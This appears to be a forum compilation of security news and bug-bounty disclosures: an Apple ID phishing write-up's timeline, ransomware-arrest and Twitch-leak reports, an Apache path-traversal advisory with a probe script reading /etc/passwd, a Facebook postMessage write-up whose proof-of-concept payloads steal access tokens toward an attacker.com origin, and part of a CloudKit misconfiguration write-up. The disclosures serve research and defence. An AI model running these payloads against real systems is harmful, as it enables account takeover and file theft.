5. Manipulate browser history to set the exploit page location to https://apple.com, and then delete the history record of being on the exploit page. If the user checks whether they came from a legitimate Apple site, they'll just see apple.com and be unable to go back.

Full commented source code can be found here. Video demonstration of the Proof of Concept on desktop. Although I started this project before Apple had its bug bounty program, I reported it just as the bug bounty program started, and so I inadvertently made money out of it. Apple paid me $10,000 for my bug and proof of concept, which, while I'm trying not to be a shit about it, is 2.5 times lower than the lowest bounty on their Example Payouts page, for creating an app that can access "a small amount of sensitive data". Hopefully other researchers are paid more! I also hope this was an interesting read! 
I took a really long time to write this, with the pandemic kind of sapping my energy, in the sincere hope that, despite the technical complexity here, I could write something accessible to those new to security. Thomas

Thanks to perribus, iammandatory, and taviso for reviewing earlier versions of this disclosure. If Apple is reading this, please do something about my other bug reports, it has been literally years, and also add my name to the Apple Hall of Fame 🥺🥺 Full timeline follows this article.

edit: Apple says my Hall of Fame will happen in September!
edit: September is almost over and it hasn't happened!

Timeline

Report to fix time: 3 days
Fix to offer time: 4 months, 3 days
Payment offer to payment time: 4 months, 5 days
Total time: 8 months, 8 days

Friday, November 15th 2019: First Apple bug, an XSS on apple.com, reported
Saturday, November 16th 2019: Issues noticed in Apple ID. The previous bug I reported has been mitigated, but no email from Apple about it
Thursday, November 21st 2019, 3:43AM GMT: First proof of concept sent to Apple demonstrating impersonating iCloud to Apple ID, using it to steal Apple users' information
Thursday, November 21st 2019, 6:06AM GMT: Templated response from Apple, saying they're looking into it
Thursday, November 21st 2019, 8:20PM GMT: Provided first Apple ID proof of concept which injects malicious code, along with some video documentation
Sunday, November 24th 2019: The issue is mitigated (partially fixed) by Apple
Thursday, November 28th 2019: Ask for updates
Tuesday, December 3rd 2019: Apple tells me there is nothing to share with me
Wednesday, December 4th 2019: I try to pull some strings with friends to get a reply
December 10th 2019: I ask if there is an update
Friday, January 10th 2020: I get an automated email saying, in essence, (1) don't disclose the bug to the public until 'investigation is complete' and (2) Apple will provide information over the course of the investigation. I email for an update
Wednesday, January 29th 2020: Ask for another update (at the 2 month mark)
Friday, January 31st 2020: Am asked to check if it's been fixed. Yes, but not exactly in the way I might have liked
Sunday, February 2nd 2020: At ShmooCon, a security conference in Washington DC, I happen to meet the director of the responsible disclosure program. I talk about the difficulties I've had
Tuesday, February 4th 2020: Apple confirms the bug as fixed and asks for my name to give credit on the Apple Hall of Fame (as of August 2021, I have still not been publicly credited). I reply asking if this is covered by the bounty program. Apple responds saying that they will let me know later
Saturday, February 15th 2020: I ask for an update on status
Monday, February 17th 2020: Apple responds: no updates. I ask when I'll hear back
Friday, February 21st 2020: I contact the director of the program with the details I got at ShmooCon, asking what the expected turnaround on bugs is
Monday, March 2nd 2020: Apple responds. They say they have no specific date
Tuesday, March 3rd 2020: The director responds, saying they don't give estimates on timelines, but he'll get it looked into
Tuesday, March 24th 2020: Offered $10,000 for the Apple ID code injection vulnerability. Asked to register as an Apple developer so I can get paid through there
Sunday, March 29th 2020: Enroll in the Apple Developer program, and ask when I'll be able to disclose publicly. 
Tuesday, March 31st 2020: Told to accept the terms and set up my account and tax information (I am not told anything about disclosure)
Tuesday, March 31st 2020: Ask for more detailed instructions, because I can't find out how to set up my account and tax information (this is because my Apple Developer application has not yet been accepted)
Thursday, April 2nd 2020: Ask if this is being considered as a generic XSS, because the payout seems weird compared to the examples
Tuesday, April 28th 2020: Apple replies to my request for more detailed instructions (it's the same thing, but reworded)
May 13th 2020: I ask for an update
May 18th 2020: Am told the money is "in process to be paid", with no exact date, but expected in May or early June. They'll get back when they know
May 18th 2020: I ask again when I can disclose
May 23rd 2020: I am told my information has been sent to the accounts team, and that Apple will contact me about it when appropriate
June 8th 2020: I ask for some kind of update on payment, or when I can disclose
June 10th 2020: I am informed that there is 'a new process'. The new process means I pay for my Apple Developer account myself, and Apple reimburses me that cost. I tell Apple I did this several months ago, and ask how my bug was classified within the program. I also contact the Apple security director asking if I can get help. He's no longer with Apple
June 15th 2020: Apple asks me to provide an 'enrolment ID'
June 15th 2020: I send Apple a screenshot of what I am seeing. All my application shows is 'Contact us to continue your enrolment'. I say I'm pretty frustrated and threaten to disclose the vulnerability if I am not given some way forward on several questions: (1) how the bug was classified, (2) when I can disclose this, and (3) what I am missing to get paid. I also rant about it on Twitter, which was probably the most productive thing I did to get a proper response, in retrospect
June 19th 2020: Apple gets in touch, saying they've completed the account review and now I need to set up a bank account to get paid in. Apple says they're OK with disclosing, as long as the issue is addressed in an update. Apple asks for a draft of my disclosure
Thursday, July 2nd 2020: The Apple people are very gracious. They say thanks for the report, and say my writeup is pretty good. Whoever is answering is very surprised by, and asks me to correct, the part where I say I found this bug only "a few days ago" in the draft I wrote 🤔
July 29th 2020: I get paid
… the pandemic happens …
12 August 2021: I finish my writeup!

Amendments

22/Aug/21: Fixed link to 'full source code', which originally linked to only a very small portion of the full source.

Source: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41
      • 4
      • Thanks
      • Upvote
18. Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents. The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), alongside participation from Europol's European Cybercrime Centre and INTERPOL's Cyber Fusion Centre. "The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol said in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met." Besides the two arrests, the international police operation involved a total of seven property raids, leading to the seizure of $375,000 in cash and two luxury vehicles costing €217,000 ($251,543), as well as the freezing of cryptocurrency assets worth $1.3 million. The suspects are believed to have demanded hefty sums ranging anywhere between €5 million and €70 million as part of their extortion spree, and are connected to a gang that has staged ransomware attacks against more than 100 different companies, causing damages upwards of $150 million, according to the Ukrainian National Police. The identity of the syndicate has not been disclosed. One of the two arrestees, a 25-year-old Ukrainian national, allegedly deployed "virus software" by breaking into remote working programs, with the intrusions staged through social engineering campaigns that delivered spam messages containing malicious content to corporate email inboxes, the agency added. The development comes over three months after the Ukrainian authorities took steps to arrest members of the Clop ransomware gang and disrupt the infrastructure the group employed in attacks targeting victims worldwide dating all the way back to 2019. Source: https://thehackernews.com/2021/10/ransomware-hackers-who-attacked-over.html
19. An unknown individual has leaked the source code and business data of video streaming platform Twitch via a torrent file posted on the 4chan discussion board earlier today. The leaker said they shared the data as a response to the recent "hate raids" — coordinated bot attacks posting hateful and abusive content in Twitch chats — that have plagued the platform's top streamers over the summer. "Their community is […] a disgusting toxic cesspool, so to foster more disruption and competition in the online video streaming space, we have completely pwned them, and in part one, are releasing the source code from almost 6,000 internal Git repositories," the leaker said earlier today. The Record has downloaded parts of the 125 GB torrent file shared by the leaker in order to confirm its authenticity. The content of the leak is in tune with what the leaker claimed to have shared earlier today, quoted below:

Entirety of Twitch.tv, with commit history going back to its early beginnings
Mobile, desktop and video game console Twitch clients
Various proprietary SDKs and internal AWS services used by Twitch
Every other property that Twitch owns, including IGDB and CurseForge
An unreleased Steam competitor from Amazon Game Studios
Twitch SOC internal red teaming tools (lol)
AND: Creator payout reports from 2019 until now. Find out how much your favorite streamer is really making!

Among the treasure trove of data, the most sensitive folders are the ones holding information about Twitch's user identity and authentication mechanisms, admin management tools, and data from Twitch's internal security team, including white-boarded threat models describing various parts of Twitch's backend infrastructure [see redacted image in the original article]. While at the time of writing The Record was unable to find personal details for any Twitch users, the leak also contained payout schemes for the platform's top streamers, some of whom had already confirmed its accuracy [1, 2, 3, 4]. The data, which we will not be linking or sharing in any way, exposes the monthly revenues for some of the platform's biggest earners, some of which reach six-figure sums; data that could be a boon for extortionists and criminal groups. A Twitch spokesperson did not immediately return a request for comment regarding today's leak. The source of the leak is currently believed to be an internal Git server. Git servers are typically used by companies to allow large teams of programmers to make controlled and easily reversible changes to source code repositories. The leak was also labeled as "part one," suggesting that more data will be leaked in the future. Although no user data was found in the leak, several security researchers have urged users to change their passwords and enable a multi-factor authentication solution for their account as a precaution. The leak comes a month after thousands of Twitch streamers organized the #ADayOffTwitch walkout on September 1, refusing to stream in response to the ever-increasing hate raids. In August, Twitch promised to address the hate raids in a message posted on Twitter, asking for patience as the spam attacks did not have "a simple fix." Article text has been updated with additional screenshots of the leak and confirmations from Twitch streamers. Title and text have been updated to remove mention of the Anonymous hacker collective as the source of the leak. Source: https://therecord.media/twitch-source-code-and-business-data-leaked-on-4chan/
20. Apache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild. "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root," the open-source project maintainers noted in an advisory published Tuesday. "If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts." The flaw, tracked as CVE-2021-41773, affects only Apache HTTP Server version 2.4.49. Ash Daulton and the cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021. Also resolved by Apache is a null pointer dereference vulnerability observed during the processing of HTTP/2 requests (CVE-2021-41524), which allows an adversary to perform a denial-of-service (DoS) attack on the server. The non-profit corporation said the weakness was introduced in version 2.4.49. Apache users are highly recommended to patch as soon as possible to contain the path traversal vulnerability and mitigate any risk associated with active exploitation of the flaw. (A minimal probe for the traversal flaw is sketched after the source link below.) Source: https://securityaffairs.co/wordpress/122999/hacking/apache-zero-day-flaw.html
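To make the mechanics concrete: the publicly known exploitation pattern for CVE-2021-41773 uses ".%2e" path segments, which Apache 2.4.49's changed normalization failed to collapse. A minimal probe in Node.js (a sketch for a lab host you control; "lab.example:8080" is a placeholder, and Node's http module is used deliberately because, unlike fetch() and the WHATWG URL parser, it sends the path un-normalized):

// Probe a lab Apache 2.4.49 instance for CVE-2021-41773.
// Only succeeds if the mapped directory is not covered by "require all denied".
const http = require("http");

http.get(
  {
    host: "lab.example",
    port: 8080,
    // ".%2e" decodes to "..": the server applies (broken) normalization
    // before percent-decoding, so the traversal survives.
    path: "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd",
  },
  (res) => {
    let body = "";
    res.on("data", (chunk) => (body += chunk));
    res.on("end", () => console.log(res.statusCode, body));
  }
);

A 200 response with file contents confirms the flaw; a patched or hardened server refuses the request (typically 400 or 403).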
21. Summary

Facebook has allowed online game owners to host their games/applications on apps.facebook.com for many years now. The idea and technology behind it was that the game (Flash or HTML5 based) would be hosted on the owner's website, and the page hosting it would then be shown to the Facebook user on apps.facebook.com inside a controlled iframe. Since the game is not hosted on Facebook, and for the best user experience (like keeping score and profile data), Facebook had to establish a communication channel with the game owner, for example to verify the identity of the Facebook user. This was ensured by using cross-window communication/messaging between apps.facebook.com and the game website inside the iframe. In this blog post, I'll be discussing multiple vulnerabilities I found in this implementation.

Vulnerabilities potential

These bugs were found after careful auditing of the client-side code inside apps.facebook.com responsible for verifying what's coming through this channel. The bugs explained below (and others) allowed me to take over any Facebook account if the user decided to visit my game page inside apps.facebook.com. The severity of these bugs is high, since they were present for years, and billions of users and their information could have been compromised easily, since this was served from inside Facebook. Facebook confirmed they didn't see any indicators of previous abuse or exploitation of these bugs.

For Researchers

Before explaining the actual bugs below, I tried to show the way I decomposed the code and a simplified path to track the flow of the message data and how its components will be used. I probably didn't leave much to dig into, but I hope the information shared could help you in your research. If you are only interested in the bugs themselves, then jump to each bug section.

Description

So far we know that the game page being served inside an iframe on apps.facebook.com is communicating with the parent window to ask Facebook to do some actions. Among the requested actions, for example, is to show a dialog to the user that would allow them to confirm the usage of the Facebook application owned by the game developers, which would help the developers identify the user and get some information via an access token that they'll receive if the user decides to use the application. The script responsible for receiving the cross-window messages, interpreting them and understanding the action demanded is below (only necessary parts are shown, as they were before the bugs were fixed):

__d("XdArbiter", ... handleMessage: function(a, b, e) { d("Log").debug("XdArbiter at " + (window.name != null && window.name !== "" ? window.name : window == top ? "top" : "[no name]") + " handleMessage " + JSON.stringify(a)); if (typeof a === "string" && /^FB_RPC:/.test(a)) { k.enqueue([a.substring(7), { origin: b, source: e || i[h] }]); ... send: function(a, b, e) { var f = e in i ? e : h; a = typeof a === "string" ? a : c("QueryString").encode(a); b = b; try { d("SecurePostMessage").sendMessageToSpecificOrigin(b, a, e) } catch (a) { d("Log").error("XdArbiter: Proxy for %s not available, page might have been navigated: %s", f, a.message), delete i[f] } return !0 } ... 
window.addEventListener("message", function(a) { if (a.data.xdArbiterSyn) d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, { xdArbiterAck: !0 }); else if (a.data.xdArbiterRegister) { var b = l.register(a.source, a.data.xdProxyName, a.data.origin, a.origin); d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, { xdArbiterRegisterAck: b }) } else a.data.xdArbiterHandleMessage && l.handleMessage(a.data.message, a.data.origin, a.source) }), 98); __d("JSONRPC", ... c.read = function(a, c) { ... e = this.local[a.method]; try { e = e.apply(c || null, a.params); typeof e !== "undefined" && g("result", e) ... e.exports = a }), null); __d("PlatformAppController", ... function f(a, b, e) { ... c("PlatformDialogClient").async(f, a, function(d) { ... b(d) }); }... t.local.showDialog = f; ... t = new(c("JSONRPC"))(function(a, b) { var d = b.origin || k; b = b.source; if (b == null) { var e = c("ge")(j); b = e.contentWindow } c("XdArbiter").send("FB_RPC:" + a, b, d) } ... }), null); __d("PlatformDialogClient", ... function async(a, b, e) { var f = c("guid")(), g = b.state; b.state = f; b.redirect_uri = new(c("URI"))("/dialog/return/arbiter").setSubdomain("www").setFragment(c("QueryString").encode({ origin: b.redirect_uri })).getQualifiedURI().toString(); b.display = "async"; j[f] = { callback: e || function() {}, state: g }; e = "POST"; d("AsyncDialog").send(new(c("AsyncRequest"))(this.getURI(a, b)).setMethod(e).setReadOnly(!0).setAbortHandler(k(f)).setErrorHandler(l(f))) } ... function getURI(a, b) { if (b.version) { var d = new(c("URI"))("/" + b.version + "/dialog/" + a); delete b.version; return d.addQueryData(b) } return c("PlatformVersioning").versionAwareURI(new(c("URI"))("/dialog/" + a).addQueryData(b)) } }), 98); To simplify the code for you to understand the flow in case someone decides to dig more into it and looks for more bugs : Iframe sends message to parent => Message event dispatched in XdArbiter => Message handler function passes data to handleMessage function => “enqueue” function passes to JSONRPC => JSONRPC.read calls this.local.showDialog function in PlatformAppController => function checks message and if all valid, call PlatformDialogClient => PlatformDialogClient.async sends a POST request to apps.facebook.com/dialog/oauth , returned access_token would be passed to XdArbiter.send function ( few steps were skipped ) => XdArbiter.send would send a cross window message to the iframe window => Event dispatched in iframe window containing Facebook user access_token Below an example of a simple code to construct the message to be sent to apps.facebook.com from the iframe, a similar one would be send from any game page using the Facebook Javascript SDK but with more unnecessary parts: msg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://ysamm.com/callback","app_id":"APP_ID","client_id":"APP_ID","response_type":"token"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + msg , origin: IFRAME_ORIGIN} window.parent.postMessage(fullmsg,"*"); Interested parts to manipulate are : – IFRAME_ORIGIN, which is the one to be used in the redirect_uri parameter send with the POST request to apps.facebook.com/dialog/oauth to be verified server-side that it’s a domain owned by the application requesting an access_token, then would be used as targetOrigin in postMessage to send a cross window message to the iframe with the access_token – Keys and values of the object 
inside params; these are the parameters to be appended to apps.facebook.com/dialog/oauth. The most interesting ones are redirect_uri (which can replace IFRAME_ORIGIN in the POST request in some cases) and APP_ID.

Attack vectors/scenarios

What we'll do here is, instead of requesting an access token for the game application we own, try to get one for a Facebook first-party application like Instagram. What's holding us back is that although we control IFRAME_ORIGIN and APP_ID, which we can set to match the Instagram application as www.instagram.com and 124024574287414, the message later sent to the iframe containing the first-party access token would have a targetOrigin in postMessage of www.instagram.com, which is not our window origin. Facebook did a good job protecting against these attacks (I'd argue, though, that using the origin from the received message event and matching the app_id to the hosted game, instead of giving us total freedom, would have prevented all these bugs), but apparently they left some weaknesses that could have been exploited for many years.

Bug 1: Parameter Pollution, it was checked server-side and we definitely should trust it

This bug occurs due to the fact that the POST request to https://apps.facebook.com/dialog/oauth, when constructed from the message received from the iframe, could contain user-controlled parameters. All parameters are checked client-side (PlatformAppController, showDialog method, and PlatformDialogClient.async method) and duplicate parameters will be removed in PlatformAppController; the AsyncRequest module also seems to be doing some filtering (removing parameters that already exist but with brackets appended). However, due to some missing checks on the server side, a parameter name set to PARAM[random would replace a previously set parameter PARAM; for example, the redirect_uri[0 parameter value would replace redirect_uri. We can abuse this as follows:

1) Set APP_ID to be the Instagram application id.
2) The redirect_uri will be constructed in PlatformDialogClient.async (Line 72) using IFRAME_ORIGIN (it will end up as https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com), which would be sent matching our iframe window origin, but won't be used at all, as explained below.
3) Set redirect_uri[0 in params as an additional parameter (order matters, so it must come after redirect_uri) to https://www.instagram.com/accounts/signup/, which is a valid redirect_uri for the Instagram application.

The URL of the POST request ends up being something like this:

https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com&app_id=124024574287414&client_id=124024574287414&response_type=token&redirect_uri[0=https://www.instagram.com/accounts/signup/

The request ends up being successful and returns a first-party access token, since redirect_uri[0 replaces redirect_uri and it's a valid redirect_uri. On the client side, though, the logic is: if an access_token was received, the origin used to construct the redirect_uri must have worked with the app_id, so it should be trusted and used to send the message to the iframe. Behind the scenes, though, redirect_uri[0 was used and not redirect_uri. (Cool, right?) 
Proof of concept:

xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://attacker.com/callback","app_id":"124024574287414","client_id":"124024574287414","response_type":"token","redirect_uri[0":"https://www.instagram.com/accounts/signup/"}]})
fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"}
window.parent.postMessage(fullmsg,"*");

Bug 2: Why bother? Origin is undefined

The main problem for this one is that the /dialog/oauth endpoint would accept https://www.facebook.com/dialog/return/arbiter as a valid redirect_uri (without a valid origin in the fragment part) for third-party applications and some first-party ones. The second problem is that for this behaviour to occur (no origin in the fragment part), the message sent from the iframe to apps.facebook.com should not contain a.data.origin (IFRAME_ORIGIN is undefined); however, this same value would be used later to send a cross-window message to the iframe, and if null or undefined is used, the message won't be received. Luckily, I noticed that the JSONRPC function would always receive a non-null origin for the postMessage (Line 55). Since b.origin is undefined or null, k would be chosen. k could be set by the attacker by first registering a valid origin via c("Arbiter").subscribe("XdArbiter/register"), which would be triggered if our message had xdArbiterRegister and a specified origin. Before the "k" variable is set, the supplied origin would first be checked to confirm it belongs to the attacker's application, using the "/platform/app_owned_url_check/" endpoint. This is wrong, and the second problem occurs here, since we can't ensure that the next cross-origin message sent from the iframe would supply the same APP_ID. Not all first-party applications are vulnerable to this, though. I used the Facebook Watch for Android application or Portal to get a first-party access_token. The URL of the POST request would be something like this:

https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter&app_id=1348564698517390&client_id=1348564698517390&response_type=token

Proof Of Concept

window.parent.postMessage({xdArbiterRegister:true,origin:"https://attacker.com"},"*")
xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","app_id":"1348564698517390","client_id":"1348564698517390","response_type":"token"}]})
fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg}
window.parent.postMessage(fullmsg,"*");

Bug 3: Total Chaos, version can't be harmful

This bug occurs in the PlatformDialogClient.getURI function, which is responsible for setting the API version before the /dialog/oauth endpoint. This function didn't check for double dots or added paths, and directly constructed a URI object to be used later to send an XHR request (Line 86). The version property in params, passed in the cross-window message sent to apps.facebook.com, could be set to api/graphql/?doc_id=DOC_ID&variables=VAR# and would eventually lead to a POST request being sent to the GraphQL endpoint with a valid user CSRF token. DOC_ID and VAR could be set to the id of a GraphQL mutation that adds a phone number to the account, and the variables of this mutation. 
The URL of the POST request would be something like this:

https://apps.facebook.com/api/graphql?doc_id=DOC_ID&variables=VAR&?/dialog/oauth&state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=attacker&app_id=1348564698517390&client_id=1348564698517390&response_type=token

Proof Of Concept

xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","client_id":"APP_ID","response_type":"token","version":"api/graphql?doc_id=DOC_ID&variables=VAR&"}]})
fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"}
window.parent.postMessage(fullmsg,"*");

Timeline

Aug 4, 2021: Report sent
Aug 4, 2021: Acknowledged by Facebook
Aug 6, 2021: Fixed by Facebook
Sep 2, 2021: $42,000 bounty awarded by Facebook

Aug 9, 2021: Report sent
Aug 9, 2021: Acknowledged by Facebook
Aug 12, 2021: Fixed by Facebook
Aug 31, 2021: $42,000 bounty awarded by Facebook

Aug 12, 2021: Report sent
Aug 13, 2021: Acknowledged by Facebook
Aug 17, 2021: Fixed by Facebook
Sep 2, 2021: $42,000 bounty awarded by Facebook

Source: https://ysamm.com/?p=708
      • 2
      • Upvote
22. TL;DR. CloudKit, the data storage framework by Apple, has various access controls. These access controls could be misconfigured, even by Apple themselves, which affected Apple's own apps using CloudKit. This blog post explains in detail three bugs of differing criticality, found in iCrowd+, Apple News and Apple Shortcuts, uncovered by Frans Rosén while hacking CloudKit. All bugs were reported to and fixed by the Apple Security Bounty program.

Intro

Ever since the fantastic "We Hacked Apple for 3 Months" article by Ziot, Sam, Ben, Samuel and Tanner, I wanted to approach Apple myself, looking for bugs with my own mindset. The article they wrote is still one of the best inspirational posts I've ever read, and it's still a post I regularly go back to for more info. In the middle of February this year I had the ability to spend some time, and I decided to go all in on hunting bugs on Apple. If you've been in and out of bug hunting, you might recognize the same kind of feeling I had. I felt that I sucked, that I could not find anything interesting. Ben and the team had already found all the bugs, right? It took me three days, three days of fighting the imposter syndrome, feeling worthless and almost stressed by not getting anywhere. I was intercepting requests all over the place, modifying things cluelessly and expecting miracles. Miracles don't work that way. On the third day, I started to connect the dots, realized how certain assets connected to other assets, and started to understand more how things worked. This is when some of the first bugs popped up, finally restoring my self-esteem a bit, making me more relaxed and focused going forward. I dug up an old jailbroken iPad I had, which allowed me to proxy all content through my laptop. I downloaded all Apple-owned apps and started looking at the traffic.

What is CloudKit?

Quite early on I noticed that a lot of Apple's own apps used a technology called CloudKit; you could say it is Apple's equivalent to Google's Firebase. It has database storage that it is possible to authenticate to and directly fetch and save records from the client itself. I started reading the CloudKit documentation and used the CloudKit Catalog tool, and created my own container to play around with it. Before getting into the hacking of CloudKit, here's a short description of the structure of CloudKit; this is the 30-second explanation:

You create a container with a name. The suggested format is a reversed domain structure, like com.apple.xxx. All containers you create yourself will begin with iCloud.
Inside the container you have two environments, Development and Production.
Inside the environments you have three different scopes: Private, Shared and Public. Private is only accessible by your own user. Shared is used for data being shared between users, and Public is accessible by anyone, some parts with a public API-token, and some with authentication (with some exceptions, I'll get to that below).
Inside each scope, you have different zones you can create. The default zone is called _defaultZone.
Inside each zone, you have different record types that you can create yourself. Each record type can contain different record fields; these fields can save different types of data, like INT, BOOLEAN, TEXT, BINARY etc.
Inside each zone you also have records. Each record is always connected to a record type.

There are even more features to it of course, for example the ability to create indexes and security roles with permissions. 
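To make the container/scope model concrete, here is roughly what a query against a container's Public scope looks like over CloudKit Web Services (a sketch with a placeholder container, record type and API token; the endpoint shape matches the records/query calls shown later in this post):

// Query the Public scope of a CloudKit container (Node 18+ or a browser console).
const container = "iCloud.com.example.Demo"; // placeholder
const token = "YOUR_CKAPITOKEN";             // placeholder public API token

const res = await fetch(
  `https://api.apple-cloudkit.com/database/1/${container}/development/public/records/query?ckAPIToken=${token}`,
  {
    method: "POST",
    body: JSON.stringify({
      zoneID: { zoneName: "_defaultZone" },
      query: { recordType: "Updates" }, // any record type defined in the container
    }),
  }
);
console.log((await res.json()).records);

The Private and Shared scopes need a per-user session on top of this token, which is exactly the split the rest of this post pokes at.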
For the Private and Shared scopes, you always need to authenticate as yourself. For the Public scope, you can have the ability to both read and write without personal authentication. You can enable public tokens that give access to the Public scope; combined with authenticating as your own user, they also give access to the Private and Shared scopes. It was quite complex to understand all the different authentication flows and security roles, and this made me curious. Could it be that this was not only complex for me to understand, but also for teams using it internally at Apple? I started investigating where it was being used and for what.

Reconnaissance

To be able to understand where the CloudKit service was used by Apple themselves, I started to look at the ways all the different apps connected to it. By just proxying everything from the iPad and the browser, and using all the apps, I could gather a bunch of requests and responses. After looking it over, I noticed that Apple used different ways to connect to CloudKit. The iCloud assets, like Notes and Photos on www.icloud.com, used one API:

POST /database/1/com.apple.notes/production/public/records/resolve?... Host: p55-ckdatabasews.icloud.com

and the developer portal at icloud.developer.apple.com had a different API:

POST /r/v4/user/iCloud.com.mycontainer.test/Production/public/records/query?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com

A lot of iOS apps used a third API at gateway.icloud.com. This API used headers to specify what container was being used. These requests were almost always using protobuf:

POST /ckdatabase/api/client/record/save HTTP/1.1 Host: gateway.icloud.com:443 X-CloudKit-ContainerId: com.apple.siri.data Accept: application/x-protobuf Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true

If you used the CloudKit Catalog to test the CloudKit API, it would instead use api.apple-cloudkit.com:

POST /database/1/iCloud.com.example.CloudKitCatalog/production/public/records/query?... Host: api.apple-cloudkit.com

For CloudKit Catalog you needed an API-token to get access to the Public scope. When I tried connecting to the CloudKit containers I saw while intercepting the iOS apps, I failed due to the lack of the API-token needed to complete the authentication flow.

iCrowd+

When testing all the apps and subdomains of Apple, one website, made by Apple, was actually utilizing api.apple-cloudkit.com with an API-token provided. Going to https://public.icrowd.apple.com/ I could see the containers being used in the Javascript file:

containers: [{ containerIdentifier:"iCloud.com.apple.phonemo", apiTokenAuth: { apiToken:"f260733f..." }, environment:"production" }, { containerIdentifier:"iCloud.com.apple.icrowd", apiTokenAuth: { apiToken:"b90c3b24..." 
}, environment:"production" }] It then made a request to fetch the current version of the iCrowd+ application, to show the version on the start page: I could also see in the requests made by the websites that it was querying the records of the database, and that the record type was called Updates: "records" : [ { "recordName" :"FD935FB2-A401-6F05-E9D8-631BBC2A68A1", "recordType" :"Updates", "fields" : { "name" : { "value" :"iCrowd", "type" :"STRING" }, "description" : { "value" :"Updated to support iOS 14 and Personalized Hey Siri project.", "type" :"STRING" }, "version" : { "value" :"2.16.3", "type" :"STRING" }, "required" : { "value" :1, "type" :"INT64" } }, Since I had the token, I could use the CloudKit Catalog to connect to the Container: https://cdn.apple-cloudkit.com/cloudkit-catalog/?container=iCloud.com.apple.phonemo&environment=production&apiToken=f260733f...#authentication Looking at the records of the Public scope, I could see the data the website was fetching to use the version-data for the button: I then tried to add my own record to the same zone: Which gave me a response: When I now accessed the same website again at: https://public.icrowd.apple.com/, this is what I saw: I then realized that I could modify the data of the website, made a report to Apple on the 17th of February and deleted my record quickly again. Here’s a video showing the proof of concept I sent: I now realized that there might be other bugs related to permissions and that the public scope was the most interesting one, since it was shared among all users. I continued the process of finding where CloudKit databases were being utilized. Apple’s response Apple responded and fixed the issue on the 25th of February by completely removing the usage of CloudKit from the website at https://public.icrowd.apple.com/. Apple News Apple News was not really accessible from Sweden, so I created a new Apple ID based in the United States to be able to use it. As soon as I got in, I noticed that all news was served using CloudKit, and all articles were served from the public scope. That made sense, since news content was the same for all users. I could also see that the Stock app on iOS also fetched from the same container: GET /ckdatabase/stocks/topstories/WHT4Rx3... HTTP/1.1 Host: gateway.icloud.com:443 X-CloudKit-ContainerId: com.apple.news.public X-CloudKit-DatabaseScope: Public X-CloudKit-BundleId: com.apple.stocks User-Agent: AppleNews/679 Version/3.1 X-MMe-Client-Info: <iPad5,4> <iPhone OS;14.2;18B92> <com.apple.newscore/6.1 (com.apple.stocks/3.1)> Using the CloudKit API through gateway.icloud.com was tricky though. All communication was made through protobuf. There is an awesome project called InflatableDonkey that tries to reverse engineer the iCloud backup process from iOS 9. Since that project was only focusing on fetching data, a lot of methods in the Protobuf was not fully reversed, so I had to bruteforce a bit to try to find the methods needed also for modifications, and since Protobuf is binary, I didn’t really need the proper names, since each property in the protobuf is enumerable due to how the format is designed: I spent way too much time on this, almost two days straight, but as soon as I found methods I could use, modification of records in the Public scope still needed authorization for my user, and I was never able to figure out how to generate a X-CloudKit-AuthToken for the proper scope, since I was mainly interested in the Private scope. 
But remember that I mentioned different APIs talked with CloudKit differently? I logged in to www.icloud.com and went to the Notes app, which talked with CloudKit using p55-ckdatabasews.icloud.com:

POST /database/1/com.apple.notes/production/private/records/query?clientBuildNumber=2104Project55&clientMasteringNumber=2104B31 HTTP/1.1 Host: p55-ckdatabasews.icloud.com

I then changed the container from com.apple.notes to com.apple.news.public, with the Public scope instead. I also extracted one of the articles I could see when using the app from the protobuf communication to gateway.icloud.com:

POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38& clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: X-APPLE-WEB-ID=... { "records": { "recordName":"A-OQYAcObS_W_21xWarFxFQ" }, "zoneID": { "zoneName":"_defaultZone" } }

And the response was:

